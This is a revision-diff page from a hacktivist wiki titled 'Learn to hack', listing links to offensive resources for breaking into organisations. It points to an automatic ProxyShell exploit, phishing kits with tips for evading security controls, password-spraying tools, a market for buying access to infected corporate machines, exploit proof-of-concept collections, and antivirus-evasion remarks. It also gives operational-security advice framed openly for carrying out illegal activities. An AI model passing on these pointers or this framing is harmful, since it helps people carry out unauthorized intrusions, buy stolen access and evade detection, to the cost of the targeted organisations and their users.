Learn to hack: Difference between revisions

From Enlace Hacktivista
Jump to navigation Jump to search
Line 147: Line 147:
* Automatic ProxyShell Exploit: https://github.com/Udyz/proxyshell-auto
* Automatic ProxyShell Exploit: https://github.com/Udyz/proxyshell-auto


== Initial Access ==  
== Initial Access ==


=== Phishing ===
There are many ways to get a foothold into a targets network, from phishing, buying credential access, buying infected machines in corporate networks and hacking ini. Here we list some resources in these regards.
* https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html
* https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165
* https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55
* https://www.xanthus.io/mastering-the-simulated-phishing-attack
* https://github.com/Arno0x/EmbedInHTML
* https://github.com/L4bF0x/PhishingPretexts
* http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html
* https://book.hacktricks.xyz/phishing-methodology
* https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective
* https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/
* https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/
* https://getgophish.com/ Be sure to [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]
* https://github.com/curtbraz/PhishAPI
* https://github.com/edoverflow/can-i-take-over-xyz
* https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/


=== Password spraying ===
For more information on gaining a foothold, see [[Initial Access Tactics, techniques and procedures]]
* https://github.com/dafthack/MSOLSpray
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying/
* https://github.com/blacklanternsecurity/TREVORspray
* https://github.com/x90skysn3k/brutespray
 
=== Buying Access ===
* https://genesis.market/
 
=== CVE POCs ===
* https://github.com/nomi-sec/PoC-in-GitHub


== Scanning and Recon ==
== Scanning and Recon ==

Revision as of 13:55, 15 January 2023

This page aims to compile high quality resources for hackers. All books listed on this page can be found on Library Genesis and Z-Library

General Resources

Resources that assume little to no background knowledge:

Resources that assume minimal tech background:

Resources that assume a tech or hacking background:

Practice labs:

General references:

Active Directory

Tools

Office 365 & Azure

Tools

GSuite

https://www.slideshare.net/dafthack/ok-google-how-do-i-red-team-gsuite

C2 Frameworks

Antivirus & EDR Evasion

VMware

RocketChat

Microsoft Exchange

ProxyLogon is dead. It's mitigated by Defender. ProxyShell is not. AMSI catches unmodified public exploits.

Initial Access

There are many ways to get a foothold into a targets network, from phishing, buying credential access, buying infected machines in corporate networks and hacking ini. Here we list some resources in these regards.

For more information on gaining a foothold, see Initial Access Tactics, techniques and procedures

Scanning and Recon

Search Engines

Search engines are a useful tool for gathering information and intelligence from publicly available sources. Some are paid and some are not. Make sure to operate good OPSEC whenever placing a purchase for any service that will be used in your recon on a target.

For more information on recommended search engines, see Search Engines Resources

Web Crawlers

Wordlists

OSINT

Open-source intelligence (OSINT) refers to the collection and analysis of information from publicly available sources to be used in an intelligence context.

For more information on recommended tools and resources, see OSINT Tools and Resources

API Hacking

Intercepting Proxies

These let you view, edit, and replay requests, and are extremely useful for finding vulnerabilities in web applications.

Opsec

Operational security (Opsec) is crucial for protecting oneself from surveillance and maintaining anonymity while conducting illegal activities.

Recommended Measures

Any illegal activity should be done from an encrypted and separate computer or virtual machine, with all traffic over Tor.

For more information on recommended measures, see Opsec Measures

Secure Messaging

Best practice for secure messaging includes using connections over Tor and end-to-end encryption for messages.

Recommended Applications

For Jabber/XMPP, make sure to enable OTR or OMEMO encryption. For email use PGP for encryption. For file sharing use onionshare.

For more information on recommended applications, see Secure Messaging Applications